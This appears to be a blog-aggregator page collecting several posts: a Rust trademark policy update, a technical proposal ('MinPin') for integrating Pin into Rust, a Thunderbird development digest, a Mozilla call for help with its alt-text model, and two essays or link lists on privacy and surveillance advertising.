The Rust Programming Language BlogNext Steps on the Rust Trademark Policy

As many of you know, the Rust language trademark policy has been the subject of an extended revision process dating back to 2022. In 2023, the Rust Foundation released an updated draft of the policy for input following an initial survey about community trademark priorities from the previous year along with review by other key stakeholders, such as the Project Directors. Many members of our community were concerned about this initial draft and shared their thoughts through the feedback form. Since then, the Rust Foundation has continued to engage with the Project Directors, the Leadership Council, and the wider Rust project (primarily via all@) for guidance on how to best incorporate as much feedback as possible.

After extensive discussion, we are happy to circulate an updated draft with the wider community today for final feedback. An effective trademark policy for an open source community should reflect our collective priorities while remaining legally sound. While the revised trademark policy cannot perfectly address every individual perspective on this important topic, its goal is to establish a framework to help guide appropriate use of the Rust trademark and reflect as many common values and interests as possible. In short, this policy is designed to steer our community toward a shared objective: to maintain and protect the integrity of the Rust programming language.

The Leadership Council is confident that this updated version of the policy has addressed the prevailing concerns about the initial draft and honors the variety of voices that have contributed to its development. Thank you to those who took the time to submit well-considered feedback for the initial draft last year or who otherwise participated in this long-running process to update our policy to continue to satisfy our goals.

Please review the updated Rust trademark policy here, and share any critical concerns you might have via this form by November 20, 2024. The Foundation has also published a blog post which goes into more detail on the changes made so far. The Leadership Council and Project Directors look forward to reviewing concerns raised and approving any final revisions prior to an official update of the policy later this year.

Niko MatsakisMinPin: yet another pin proposal

This post floats a variation of boats’ UnpinCell proposal that I’m calling MinPin.1 MinPin’s goal is to integrate Pin into the language in a “minimally disruptive” way2 – and in particular a way that is fully backwards compatible. Unlike Overwrite, MinPin does not attempt to make Pin and &mut “play nicely” together. It does however leave the door open to add Overwrite in the future, and I think helps to clarify the positives and negatives that Overwrite would bring.

TL;DR: Key design decisions

Here is a brief summary of MinPin’s rules

  • The pinned keyword can be used to get pinned variations of things:
    • In types, pinned P is equivalent to Pin<P>, so pinned &mut T and pinned Box<T> are equivalent to Pin<&mut T> and Pin<Box<T>> respectively.
    • In function signatures, pinned &mut self can be used instead of self: Pin<&mut Self>.
    • In expressions, pinned &mut $place is used to get a pinned &mut that refers to the value in $place.
  • The Drop trait is modified to have fn drop(pinned &mut self) instead of fn drop(&mut self).
    • However, impls of Drop are still permitted (even encouraged!) to use fn drop(&mut self), but it means that your type will not be able to use (safe) pin-projection. For many types that is not an issue; for futures or other “address sensitive” types, you should use fn drop(pinned &mut self).
  • The rules for field projection from a s: pinned &mut S reference are based on whether or not Unpin is implemented:
    • Projection is always allowed for fields whose type implements Unpin.
    • For fields whose types are not known to implement Unpin:
      • If the struct S is Unpin, &mut projection is allowed but not pinned &mut.
      • If the struct S is !Unpin[^neg] and does not have a fn drop(&mut self) method, pinned &mut projection is allowed but not &mut.
      • If the type checker does not know whether S is Unpin or not, or if the type S has a Drop impl with fn drop(&mut self), neither form of projection is allowed for fields that are not Unpin.
  • There is a type struct Unpinnable<T> { value: T } that always implements Unpin.

Design axioms

Before I go further I want to layout some of my design axioms (beliefs that motivate and justify my design).

  • Pin is part of the Rust language. Despite Pin being entirely a “library-based” abstraction at present, it is very much a part of the language semantics, and it deserves first-class support. It should be possible to create pinned references and do pin projections in safe Rust.
  • Pin is its own world. Pin is only relevant in specific use cases, like futures or in-place linked lists.
  • Pin should have zero-conceptual-cost. Unless you are writing a Pin-using abstraction, you shouldn’t have to know or think about pin at all.
  • Explicit is possible. Automatic operations are nice but it should always be possible to write operations explicitly when needed.
  • Backwards compatible. Existing code should continue to compile and work.

Frequently asked questions

For the rest of the post I’m just going to go into FAQ mode.

I see the rules, but can you summarize how MinPin would feel to use?

Yes. I think the rule of thumb would be this. For any given type, you should decide whether your type cares about pinning or not.

Most types do not care about pinning. They just go on using &self and &mut self as normal. Everything works as today (this is the “zero-conceptual-cost” goal).

But some types do care about pinning. These are typically future implementations but they could be other special case things. In that case, you should explicitly implement !Unpin to declare yourself as pinnable. When you declare your methods, you have to make a choice

  • Is the method read-only? Then use &self, that always works.
  • Otherwise, use &mut self or pinned &mut self, depending…
    • If the method is meant to be called before pinning, use &mut self.
    • If the method is meant to be called after pinning, use pinned &mut self.

This design works well so long as all mutating methods can be categorized into before-or-after pinning. If you have methods that need to be used in both settings, you have to start using workarounds – in the limit, you make two copies.

How does MinPin compare to UnpinCell?

Those of you who have been following the various posts in this area will recognize many elements from boats’ recent UnpinCell. While the proposals share many elements, there is also one big difference between them that makes a big difference in how they would feel when used. Which is overall better is not yet clear to me.

Let’s start with what they have in common. Both propose syntax for pinned references/borrows (albeit slightly different syntax) and both include a type for “opting out” from pinning (the eponymous UnpinCell<T> in UnpinCell, Unpinnable<T> in MinPin). Both also have a similar “special case” around Drop in which writing a drop impl with fn drop(&mut self) disables safe pin-projection.

Where they differ is how they manage generic structs like WrapFuture<F>, where it is not known whether or not they are Unpin.

struct WrapFuture<F: Future> {
    future: F,
}

The r: pinned &mut WrapFuture<F>, the question is whether we can project the field future:

impl<F: Future> WrapFuture<F> {
    fn method(pinned &mut self) {
        let f = pinned &mut r.future;
        //      --------------------
        //      Is this allowed?
    }
}

There is a specific danger case that both sets of rules are trying to avoid. Imagine that WrapFuture<F> implements Unpin but F does not – e.g., imagine that you have a impl<F: Future> Unpin for WrapFuture<F>. In that case, the referent of the pinned &mut WrapFuture<F> reference is not actually pinned, because the type is unpinnable. If we permitted the creation of a pinned &mut F, where F: !Unpin, we would be under the (mistaken) impression that F is pinned. Bad.

UnpinCell handles this case by saying that projecting from a pinned &mut is only allowed so long as there is no explicit impl of Unpin for WrapFuture (“if [WrapFuture<F>] implements Unpin, it does so using the auto-trait mechanism, not a manually written impl”). Basically: if the user doesn’t say whether the type is Unpin or not, then you can do pin-projection. The idea is that if the self type is Unpin, that will only be because all fields are unpin (in which case it is fine to make pinned &mut references to them); if the self type is not Unpin, then the field future is pinned, so it is safe.

In contrast, in MinPin, this case is only allowed if there is an explicit !Unpin impl for WrapFuture:

impl<F: Future> !Unpin for WrapFuture<F> {
    // This impl is required in MinPin, but not in UnpinCell
}

Explicit negative impls are not allowed on stable, but they were included in the original auto trait RFC. The idea is that a negative impl is an explicit, semver-binding commitment not to implement a trait. This is different from simply not including an impl at all, which allows for impls to be added later.

Why would you prefer MinPin over UnpinCell or vice versa?

I’m not totally sure which of these is better. I came to the !Unpin impl based on my axiom that pin is its own world – the idea was that it was better to push types to be explicitly unpin all the time than to have “dual-mode” types that masquerade as sometimes pinned and sometimes not.

In general I feel like it’s better to justify language rules by the presence of a declaration than the absence of one. So I don’t like the idea of saying “the absence of an Unpin impl allows for pin-projection” – after all, adding impls is supposed to be semver-compliant. Of course, that’s much lesss true for auto traits, but it can still be true.

In fact, Pin has had some unsoundness in the past based on unsafe reasoning that was justified by the lack of an impl. We assumed that &T could never implemented DerefMut, but it turned out to be possible to add weird impls of DerefMut in very specific cases. We fixed this by adding an explicit impl<T> !DerefMut for &T impl.

On the other hand, I can imagine that many explicitly implemented futures might benefit from being able to be ambiguous about whether they are Unpin.

What does your design axiom “Pin is its own world” mean?

The way I see it is that, in Rust today (and in MinPin, pinned places, UnpinCell, etc), if you have a T: !Unpin type (that is, a type that is pinnable), it lives a double life. Initially, it is unpinned, and you interact can move it, &-ref it, or &mut-ref it, just like any other Rust value. But once a !Unpin value becomes pinned to a place, it enters a different state, in which you can no longer move it or use &mut, you have to use pinned &mut:

flowchart TD
Unpinned[
    Unpinned: can access 'v' with '&' and '&mut'
]

Pinned[
    Pinned: can access 'v' with '&' and 'pinned &mut'
]

Unpinned --
    pin 'v' in place (only if T is '!Unpin')
--> Pinned
  

One-way transitions like this limit the amount of interop and composability you get in the language. For example, if my type has &mut methods, I can’t use them once the type is pinned, and I have to use some workaround, such as duplicating the method with pinned &mut.3 In this specific case, however, I don’t think this transition is so painful, and that’s because of the specifics of the domain: futures go through a pretty hard state change where they start in “preparation mode” and then eventually start executing. The set of methods you need at these two phases are quite distinct. So this is what I meant by “pin is its own world”: pin is not very interopable with Rust, but this is not as bad as it sounds, because you don’t often need that kind of interoperability.

How would Overwrite affect pin being in its own world?

With Overwrite, when you pin a value in place, you just gain the ability to use pinned &mut, you don’t give up the ability to use &mut:

flowchart TD
Unpinned[
    Unpinned: can access 'v' with '&' and '&mut'
]

Pinned[
    Pinned: can additionally access 'v' with 'pinned &mut'
]

Unpinned --
    pin 'v' in place (only if T is '!Unpin')
--> Pinned
  

Making pinning into a “superset” of the capabilities of pinned means that pinned &mut can be coerced into an &mut (it could even be a “true subtype”, in Rust terms). This in turn means that a pinned &mut Self method can invoke &mut self methods, which helps to make pin feel like a smoothly integrated part of the language.3

So does the axiom mean you think Overwrite is a bad idea?

Not exactly, but I do think that if Overwrite is justified, it is not on the basis of Pin, it is on the basis of immutable fields. If you just look at Pin, then Overwrite does make Pin work better, but it does that by limiting the capabilities of &mut to those that are compatible with Pin. There is no free lunch! As Eric Holk memorably put it to me in privmsg:

It seems like there’s a fixed amount of inherent complexity to pinning, but it’s up to us how we distribute it. Pin keeps it concentrated in a small area which makes it seem absolutely terrible, because you have to face the whole horror at once.4

I think Pin as designed is a “zero-conceptual-cost” abstraction, meaning that if you are not trying to use it, you don’t really have to care about it. That’s worth maintaining, if we can. If we are going to limit what &mut can do, the reason to do it is primarily to get other benefits, not to benefit pin code specifically.

To be clear, this is largely a function of where we are in Rust’s evolution. If we were still in the early days of Rust, I would say Overwrite is the correct call. It reminds me very much of the IMHTWAMA, the core “mutability xor sharing” rule at the heart of Rust’s borrow checker. When we decided to adopt the current borrow checker rules, the code was about 85-95% in conformance. That is, although there was plenty of aliased mutation, it was clear that “mutability xor sharing” was capturing a rule that we already mostly followed, but not completely. Because combining aliased state with memory safety is more complicated, that meant that a small minority of code was pushing complexity onto the entire language. Confining shared mutation to types like Cell and Mutex made most code simpler at the cost of more complexity around shared state in particular.

There’s a similar dynamic around replace and swap. Replace and swap are only used in a few isolated places and in a few particular ways, but the all code has to be more conservative to account for that possibility. If we could go back, I think limiting Replace to some kind of Replaceable<T> type would be a good move, because it would mean that the more common case can enjoy the benefits: fewer borrow check errors and more precise programs due to immutable fields and the ability to pass an &mut SomeType and be sure that your callee is not swapping the value under your feet (useful for the “scope pattern” and also enables Pin<&mut> to be a subtype of &mut).

Why did you adopt pinned &mut and not &pin mut as the syntax?

The main reason was that I wanted a syntax that scaled to Pin<Box<T>>. But also the pin! macro exists, making the pin keyword somewhat awkward (though not impossible).

One thing I was wondering about is the phrase “pinned reference” or “pinned pointer”. On the one hand, it is really a reference to a pinned value (which suggests &pin mut). On the other hand, I think this kind of ambiguity is pretty common. The main thing I have found is that my brain has trouble with Pin<P> because it wants to think of Pin as a “smart pointer” versus a modifier on another smart pointer. pinned Box<T> feels much better this way.

Can you show me an example? What about the MaybeDone example?

Yeah, totally. So boats [pinned places][] post introduced two futures, MaybeDone and Join. Here is how MaybeDone would look in MinPin, along with some inline comments:

enum MaybeDone<F: Future> {
    Polling(F),
    Done(Unpinnable<Option<F::Output>>),
    //   ---------- see below
}

impl<F: Future> !Unpin for MaybeDone<F> { }
//              -----------------------
//
// `MaybeDone` is address-sensitive, so we
// opt out from `Unpin` explicitly. I assumed
// opting out from `Unpin` was the *default* in
// my other posts.

impl<F: Future> MaybeDone<F> {
    fn maybe_poll(pinned &mut self, cx: &mut Context<'_>) {
        if let MaybeDone::Polling(fut) = self {
            //                    ---
            // This is in fact pin-projection, although
            // it's happening implicitly as part of pattern
            // matching. `fut` here has type `pinned &mut F`.
            // We are permitted to do this pin-projection
            // to `F` because we know that `Self: !Unpin`
            // (because we declared that to be true).
            
            if let Poll::Ready(res) = fut.poll(cx) {
                *self = MaybeDone::Done(Some(res));
            }
        }
    }

    fn is_done(&self) -> bool {
        matches!(self, &MaybeDone::Done(_))
    }

    fn take_output(pinned &mut self) -> Option<F::Output> {
        //         ----------------
        //     This method is called after pinning, so it
        //     needs a `pinned &mut` reference...  

        if let MaybeDone::Done(res) = self {
            res.value.take()
            //  ------------
            //
            //  ...but take is an `&mut self` method
            //  and `F:Output: Unpin` is known to be true.
            //  
            //  Therefore we have made the type in `Done`
            //  be `Unpinnable`, so that we can do this
            //  swap.
        } else {
            None
        }
    }
}

Can you translate the Join example?

Yep! Here is Join:

struct Join<F1: Future, F2: Future> {
    fut1: MaybeDone<F1>,
    fut2: MaybeDone<F2>,
}

impl<F1: Future, F2: Future> !Unpin for Join<F> { }
//                           ------------------
//
// Join is a custom future, so implement `!Unpin`
// to gain access to pin-projection.

impl<F1: Future, F2: Future> Future for Join<F1, F2> {
    type Output = (F1::Output, F2::Output);

    fn poll(pinned &mut self, cx: &mut Context<'_>) -> Poll<Self::Output> {
        // The calls to `maybe_poll` and `take_output` below
        // are doing pin-projection from `pinned &mut self`
        // to a `pinned &mut MaybeDone<F1>` (or `F2`) type.
        // This is allowed because we opted out from `Unpin`
        // above.

        self.fut1.maybe_poll(cx);
        self.fut2.maybe_poll(cx);
        
        if self.fut1.is_done() && self.fut2.is_done() {
            let res1 = self.fut1.take_output().unwrap();
            let res2 = self.fut2.take_output().unwrap();
            Poll::Ready((res1, res2))
        } else {
            Poll::Pending
        }
    }
}

What’s the story with Drop and why does it matter?

Drop’s current signature takes &mut self. But recall that once a !Unpin type is pinned, it is only safe to use pinned &mut. This is a combustible combination. It means that, for example, I can write a Drop that uses mem::replace or swap to move values out from my fields, even though they have been pinned.

For types that are always Unpin, this is no problem, because &mut self and pinned &mut self are equivalent. For types that are always !Unpin, I’m not too worried, because Drop as is is a poor fit for them, and pinned &mut self will be beter.

The tricky bit is types that are conditionally Unpin. Consider something like this:

struct LogWrapper<T> {
    value: T,
}

impl<T> Drop for LogWrapper<T> {
    fn drop(&mut self) {
        ...
    }
}

At least today, whether or not LogWrapper is Unpin depends on whether T: Unpin, so we can’t know it for sure.

The solution that boats and I both landed on effectively creates three categories of types:5

  • those that implement Unpin, which are unpinnable;
  • those that do not implement Unpin but which have fn drop(&mut self), which are unsafely pinnable;
  • those that do not implement Unpin and do not have fn drop(&mut self), which are safely pinnable.

The idea is that using fn drop(&mut self) puts you in this purgatory category of being “unsafely pinnable” (it might be more accurate to say being “maybe unsafely pinnable”, since often at compilation time with generics we won’t know if there is an Unpin impl or not). You don’t get access to safe pin projection or other goodies, but you can do projection with unsafe code (e.g., the way the pin-project-lite crate does it today).

It feels weird to have Drop let you use &mut self when other traits don’t.

Yes, it does, but in fact any method whose trait uses pinned &mut self can be implemented safely with &mut self so long as Self: Unpin. So we could just allow that in general. This would be cool because many hand-written futures are in fact Unpin, and so they could implement the poll method with &mut self.

Wait, so if Unpin types can use &mut self, why do we need special rules for Drop?

Well, it’s true that an Unpin type can use &mut self in place of pinned &mut self, but in fact we don’t always know when types are Unpin. Moreover, per the zero-conceptual-cost axiom, we don’t want people to have to know anything about Pin to use Drop. The obvious approaches I could think of all either violated that axiom or just… well… seemed weird:

  • Permit fn drop(&mut self) but only if Self: Unpin seems like it would work, since most types are Unpin. But in fact types, by default, are only Unpin if their fields are Unpin, and so generic types are not known to be Unpin. This means that if you write a Drop impl for a generic type and you use fn drop(&mut self), you will get an error that can only be fixed by implementing Unpin unconditionally. Because “pin is its own world”, I believe adding the impl is fine, but it violates “zero-conceptual-cost” because it means that you are forced to understand what Unpin even means in the first place.
  • To address that, I considered treating fn drop(&mut self) as implicitly declaring Self: Unpin. This doesn’t violate our axioms but just seems weird and kind of surprising. It’s also backwards incompatible with pin-project-lite.

These considerations let me to conclude that actually the current design kind of puts in a place where we want three categories. I think in retrospect it’d be better if Unpin were implemented by default but not as an auto trait (i.e., all types were unconditionally Unpin unless they declare otherwise), but oh well.

What is the forwards compatibility story for Overwrite?

I mentioned early on that MinPin could be seen as a first step that can later be extended with Overwrite if we choose. How would that work?

Basically, if we did the s/Unpin/Overwrite/ change, then we would

  • rename Unpin to Overwrite (literally rename, they would be the same trait);
  • prevent overwriting the referent of an &mut T unless T: Overwrite (or replacing, swapping, etc).

These changes mean that &mut T is pin-preserving. If T: !Overwrite, then T may be pinned, but then &mut T won’t allow it to be overwritten, replaced, or swapped, and so pinning guarantees are preserved (and then some, since technically overwrites are ok, just not replacing or swapping). As a result, we can simplify the MinPin rules for pin-projection to the following:

Given a reference s: pinned &mut S, the rules for projection of the field f are as follows:

  • &mut projection is allowed via &mut s.f.
  • pinned &mut projection is allowed via pinned &mut s.f if S: !Unpin

What would it feel like if we adopted Overwrite?

We actually got a bit of a preview when we talked about MaybeDone. Remember how we had to introduce Unpinnable around the final value so that we could swap it out? If we adopted Overwrite, I think the TL;DR of how code would be different is that most any code that today uses std::mem::replace or std::mem::swap would probably wind up using an explicit Unpinnable-like wrapper. I’ll cover this later.

This goes a bit to show what I meant about there being a certain amount of inherent complexity that we can choose to distibute: in MinPin, this pattern of wrapping “swappable” data is isolated to pinned &mut self methods in !Unpin types. With Overwrite, it would be more widespread (but you would get more widespread benefits, as well).

Conclusion

My conclusion is that this is a fascinating space to think about!6 So fun.


  1. Hat tip to Tyler Mandry and Eric Holk who discussed these ideas with me in detail. ↩︎

  2. MinPin is the “minimal” proposal that I feel meets my desiderata; I think you could devise a maximally minimal proposal is even smaller if you truly wanted. ↩︎

  3. It’s worth noting that coercions and subtyping though only go so far. For example, &mut can be coerced to &, but we often need methods that return “the same kind of reference they took in”, which can’t be managed with coercions. That’s why you see things like last and last_mut↩︎ ↩︎

  4. I would say that the current complexity of pinning is, in no small part, due to accidental complexity, as demonstrated by the recent round of exploration, but Eric’s wider point stands. ↩︎

  5. Here I am talking about the category of a particular monomorphized type in a particular version of the crate. At that point, every type either implements Unpin or it doesn’t. Note that at compilation time there is more grey area, as they can be types that may or may not be pinnable, etc. ↩︎

  6. Also that I spent way too much time iterating on this post. JUST GONNA POST IT. ↩︎

Mozilla ThunderbirdThunderbird Monthly Development Digest: October 2024

Hello again Thunderbird Community! The last few months have involved a lot of learning for me, but I have a much better appreciation (and appetite!) for the variety of challenges and opportunities ahead for our team and the broader developer community. Catch up with last month’s update, and here’s a quick summary of what’s been happening across the different teams:

Exchange Web Services support in Rust

An important member of our team left recently and while we’ll very much miss the spirit and leadership, we all learned a lot and are in a good position to carry the project forwards. We’ve managed to unstick a few pieces of the backlog and have a few sprints left to complete work on move/copy operations, protocol logging and priority two operations (flagging messages, folder rename & delete, etc). New team members have moved past the most painful stages and have patches that have landed. Kudos to the patient mentors involved in this process!

QR Code Cross-Device Account Import

Thunderbird for Android launched this week, and the desktop client (Daily, Beta & ESR 128.4.0) now provides a simple and secure account transfer mechanism, so that account settings don’t have to be re-entered for new users of the mobile app. Download Thunderbird for Android from the Play store

Account Hub

Development of a refreshed account hub is moving forward apace and with the critical path broken down into sprints, our entire front end team is working to complete things in the next two weeks. Meta bug & progress tracking.

Clean up on aisle 2

In addition to our project work, we’ve had to be fairly nimble this month, with a number of upstream changes breaking our builds and pipelines. We get a ton of benefit from the platforms we inherit but at times it feels like we’re dealing with many things out of our control. Mental note: stay calm and focus on future improvements!

Global Database, Conversation View & folder corruption issues

On top of the conversation view feature and core refactoring to tackle the inner workings of thread-safe folder and message manipulation, work to implement a long term database replacement is well underway. Preliminary patches are regularly pumped into the development ecosystem for discussion and review, for which we’re very excited!

In-App Notifications

With phase 1 of this project now complete, we’ve scoped out additions that will make it even more flexible and suitable for a variety of purposes. Beta users will likely see the first notifications coming in November, so keep your eyes peeled. Meta Bug & progress tracking.

New Features Landing Soon

Several requested features are expected to debut this month (or very soon) and include…

As usual, if you want to see things as they land, and help us squash some early bugs, you can always check the pushlog and try running daily, which would be immensely helpful for catching things early.

See you next month.

Toby Pilling

Senior Manager, Desktop Engineering

The post Thunderbird Monthly Development Digest: October 2024 appeared first on The Thunderbird Blog.

The Mozilla BlogHelp us improve our alt text generation model

Image generated by DALL-E in response to a request for a photorealistic image of a fox standing in a grassy landscape.

Firefox 130 introduces automatic alt text for PDF images and an improved alt text flow. In addition to protecting users’ privacy with a small language model that operates locally on their device, these improvements help ensure more images receive alt text resulting in more accessible PDFs. 

You can read more about our work on the model in the earlier Hacks blog post Experimenting with local alt text generation in Firefox

The work on the model happens outside of the mozilla-central code base, but as with the rest of the Firefox code, we want to keep the process open to our community. The language models used in our product are just weight files, and we want to ensure the Mozilla community understands how it was built and can help improve it. The open source AI definition from OSI is a work in progress, and our long-term aspiration is to follow the OSI’s guidelines for our local models.

Here’s how you can contribute to improving the model and helping with the accessibility of PDF documents. 

What can be improved?

The first version of the model is a work in progress, and it will make mistakes, especially when describing complex images. This is why we designed the feature to:

  • Encourage human review so that our users can correct inaccuracies and include any missing details before saving the alt text.
  • Set expectations for users interacting with PDFs that have alt text generated:
    • When you see the text This alt text was created automatically message below the text box on the alt text editor, you’ll know that the alt text was generated using our model.
    • All users who are reading the PDF outside of the Firefox editor will experience a disclaimer that comes before the alt text. This is so people reading the alt text with a screen reader or directly on the PDF can be informed that the alt text was not human-generated. For example: “Created automatically: [alt text description will go here]”.

We hope to improve the model over time, and, as with Firefox’s source code, anyone interested in helping us refine it is welcome to contribute. You don’t have to be an AI expert – but if you are an expert and spot specific areas of improvement, we’d love to hear from you.

You can contribute by adding a new issue to our repository and choosing a topic from the issue templates:

  • Model architecture
  • Training Data
  • Training code

Here’s some information to help you file an issue under one of these topics:

Model architecture

Our vision encoder-decoder model has 180M parameters and is based on the following pre-trained models:

The VIT model was pre-trained on millions of images on the ImageNet 21k classes, which uses 21,000 words from the wordnet hierarchy to find objects in images.

The version of GPT-2 used for the text decoder is a distilled version of the GPT-2 model – a process that is used to transfer knowledge from a model to a smaller model with minimal accuracy loss. That makes it a good trade-off in terms of size and accuracy. Additionally, we built a ~800-word stop list to avoid generating profanity. 

The whole model is 180M parameters and was quantized converting float 32 weights to int8, allowing us to shrink the size on disk to ~180MB which sped up the inference time in the browser.

There are many other architectures that could have been used for this job, or different quantization levels. If you believe there is a better combination, we’d love to try it.

The constraints are:

  • Everything needs to be open source under a permissive license like APLv2.
  • The model needs to be converted into ONNX using optimum.
  • The model needs to work in Transformers.js.

Training data

To train our model, we initially used the COCO and Flickr30k datasets and eventually adapted them to remove some of the annotator biases we’ve found along the way:

  • Some annotators use gender-specific descriptions. People in an image may be described as a man or a woman, which can lead to the model misgendering people. For instance, a person on a skateboard is almost always described as a man. Similar problems exist with age-specific terms (e.g., man, boy, etc.). 
  • Some descriptions may also use less-than-inclusive language or be culturally or personally offensive in some rare cases. For instance, we have spotted annotations that were only acceptable for use by and within specific demographics, were replaced in common speech by other terms decades ago, or imposed a reductive value (e.g., sexy).

To deal with these issues, we rewrote annotations with GPT-4o using a prompt that asks for a short image description. You can find that code here and the transformed datasets are published on Hugging Face: Mozilla/flickr30k-transformed-captions-gpt4o and Mozilla/coco-gpt4o. You can read more about our process here

Training our model using these new annotations greatly improved the results, however, we still detected some class imbalance – some types of images are underrepresented like transportation and some are overrepresented, like… cats. To address this, we’ve created a new complementary dataset using Pexels, with this script and GPT4-o annotations. You can find it at Mozilla/pexels-gpt4o

We know this is still insufficient, so if you would like to help us improve our datasets, here’s what you can do:

  • If you used the feature and detected a poorly described image, send it to us so we can add it to our training datasets.
  • Create a dataset on HuggingFace to fix one or more specific class imbalances.
  • reate a dataset on HuggingFace to simply add more diverse, high-quality data.

We ask the datasets to contain the following fields:

  • Image: the image in PNG, with a maximum width or height of 700 pixels.
  • Source: the source of the image.
  • License: the license of the image. Please ensure the images you’re adding have public domain or public-domain-equivalent licenses, so they can be used for training without infringing on the rights of copyright holders. 

This will allow us to automatically generate its description using our prompt, and create a new dataset that we will include in the training loop.

Training code

To train the model, we are using Transformers’ Seq2SeqTrainer in a somewhat standard way (see more details here).

Let us know if you spot a problem or find a potential improvement in the code or in our hyperparameters!

The post Help us improve our alt text generation model appeared first on The Mozilla Blog.

Don Martilinks for 3 November 2024

Remote Startups Will Win the War for Top Talent Ironically, in another strike against the spontaneous collaboration argument, a study of two Fortune 500 headquarters found that transitioning from cubicles to an open office layout actually reduced face-to-face interactions by 70 percent.

Why Strava Is a Privacy Risk for the President (and You Too) Not everybody uses their real names or photos on Strava, but many do. And if a Strava account is always in the same place as the President, you can start to connect a few dots.

Why Getting Your Neighborhood Declared a Historic District Is a Bad Idea Historic designations are commonly used to control what people can do with their own private property, and can be a way of creating a kind of “backdoor” homeowners association. Some historic neighborhoods (many of which have dubious claims to the designation) around the country have HOA-like restrictions on renovations, repairs, and even landscaping.

Donald Trump Talked About Fixing McDonald’s Ice Cream Machines. Lina Khan Actually Did. Back in March, the FTC submitted a comment to the US Copyright Office asking to extend the right to repair certain equipment, including commercial soft-serve equipment.

An awful lot of FOSS should thank the Academy Linux and open source in general seem to be huge components of the movie special effects industry – to an extent that we had not previously realized. (unless you have a stack of old Linux Journal back issues from the early 2000s—we did a lot of movie covers at the time that much of this software was being developed.)

Using an 8K TV as a Monitor For programming, word processing, and other productive work, consider getting an 8K TV instead of a multi-monitor setup. An 8K TV will have superior image quality, resolution, and versatility compared to multiple 4K displays, at roughly the same size. (huge TVs are an under-rated, subsidized technology, like POTS lines. Most or all of the huge TVs available today are smart and sold with the expectation that they’ll drive subscription and advertising revenue, which means a discount for those who use them as monitors.)

Suchir Balaji, who spent four years at OpenAI, says OpenAI’s use of copyrighted data broke the law and failed to meet fair use criteria; he left in August 2024 Mr. Balaji believes the threats are more immediate. ChatGPT and other chatbots, he said, are destroying the commercial viability of the individuals, businesses and internet services that created the digital data used to train these A.I. systems.

The Unlikely Inventor of the Automatic Rice Cooker Fumiko, the mother of six children, spent five years researching and testing to document the ideal recipe. She continued to make rice three times a day, carefully measuring water-to-rice ratios, noting temperatures and timings, and prototyping rice-cooker designs. Conventional wisdom was that the heat source needed to be adjusted continuously to guarantee fluffy rice, but Fumiko found that heating the water and rice to a boil and then cooking for exactly 20 minutes produced consistently good results.

Comments on TSA proposal for decentralized nonstandard ID requirements Compliance with the REAL-ID Act requires a state to electronically share information concerning all driver’s licenses and state-issued IDs with all other states, but not all states do so. Because no state complies with this provision of the REAL-ID Act, or could do so unless and until all states do so, no state-issued driver’s licenses or ID cards comply with the REAL-ID Act.

Don Martior we could just not

previously: Sunday Internet optimism

The consensus, dismal future of the Internet is usually wrong. Dystopias make great fiction, but the Internet is surprisingly good at muddling through and reducing each one to nuisance level.

  • We don’t have Clipper Chip dystopia that would have put backdoors in all cryptography.

  • We don’t have software patent cartel dystopia that would have locked everyone in to limited software choices and functionality, and a stagnant market.

  • We don’t have Fritz Chip dystopia that would have mandated Digital Rights Management on all devices.

None of these problems have gone away entirely—encryption backdoors, patent trolls, and DRM are all still there—but none have reached either Internet-wide catastrophe level or faded away entirely.

Today’s hottest new dystopia narrative is that we’re going to end up with surveillance advertising features in web browsers. They’ll be mathematically different from old-school cookie tracking, so technically they won’t make it possible to identify anyone individually, but they’ll still impose the same old surveillance risks on users, since real-world privacy risks are collective.

Compromising with the dystopia narrative always looks like the realistic or grown-up path forward, until it doesn’t. And then the non-dystopia timeline generally looks inevitable once you get far enough along it. This time it’s the same way. We don’t need cross-context personalized (surveillance) advertising in our web browsers any more than we need SCO licensesnot counting the SCO license timeline as dystopia, but another good example of dismal timeline averted in our operating systems. Let’s look at the numbers. I’m going to make all the assumptions most favorable to the surveillance advertising argument. It’s actually probably a lot better than this. And it’s probably better in other countries, since the USA is relatively advanced in the commercial surveillance field. (If you have these figures for other countries, please let me know and I’ll link to them.)

Total money spent on advertising in the USA: $389.49 billion

USA population: 335,893,238

That comes out to about $1,160 spent on advertising to reach the average person in the USA every year. That’s $97 per month.

So let’s assume (again, making the assumption most favorable to the surveillance side) that all advertising is surveillance advertising. And ads without the surveillance, according to Professor Garrett Johnson are worth 52 percent less than the surveillance ads.

So if you get rid of the surveillance, your ad subsidy goes from $97 to $46. Advertisers would be spending $51 less to advertise to you, and the missing $51 is a good-sized amount of extra money to come up with every month. But remember, that’s advertising money, total, not the amount that actually makes it to the people who make the ad-supported resources you want. Since the problem is how to replace the income for the artists, writers, and everyone else who makes ad-supported content, we need to multiply the missing ad subsidy by the fraction of that top-level advertising total that makes it through to the content creator in order to come up with the amount of money that needs to be filled in from other sources like subscriptions and memberships.

How much do you need to spend on subscriptions to replace $51 in ad money? That’s going to depend on your habits. But even if you have everything set up totally right, a dollar spent on ads to reach you will buy you less than a dollar you spend yourself. Thomas Baekdal writes, in How independent publishing has changed from the 1990s until today,

Up until this point, every publisher had focused on ‘traffic at scale’, but with the new direct funding focus, every individual publisher realized that traffic does not equal money, and you could actually make more money by having an audience who paid you directly, rather than having a bunch of random clicks for the sake of advertising. The ratio was something like 1:10,000. Meaning that for every one person you could convince to subscribe, donate, become a member, or support you on Patreon … you would need 10,000 visitors to make the same amount from advertising. Or to put that into perspective, with only 100 subscribers, I could make the same amount of money as I used to earn from having one million visitors.

All surveillance ad media add some kind of adtech tax. The Association of National Advertisers found that about 1/3 of the money spent to buy ad space makes it through to the publisher.

A subscription platform and subscriber services impose some costs too. To be generous to the surveillance side, let’s say that a subscription dollar is only three times as valuable as an advertising dollar. So that $51 in missing ad money means you need to come up with $17 from somewhere. This estimate is really on the high side in practice. A lot of ad money goes to stuff like retail ad networks (online sellers bidding for better spots in shopping search results) and to ad media like billboards that don’t pay for content at all.

So, worst case, where do you get the $17? From buying less crap, that’s where. Mustri et al.(PDF) write,

[behaviorally] targeted ads are more likely to be associated with lower quality vendors, and higher prices for identical products…

You also get a piece of the national security and other collective security benefits of eliminating surveillance, some savings in bandwidth and computing resources, and a lower likelihood of becoming a victim of fraud and identity theft. But that’s pure bonus benefit on top of the win from saving money by spending less on overpriced, personally targeted, low-quality products. (If privacy protection didn’t help you buy better stuff, the surveillance companies would have said so by now, it’s an easy query to run.) Because surveillance advertising gives an advantage to deceptive advertisers over legit ones, the end of surveillance advertising would also mean an increase in sales for legit brands.

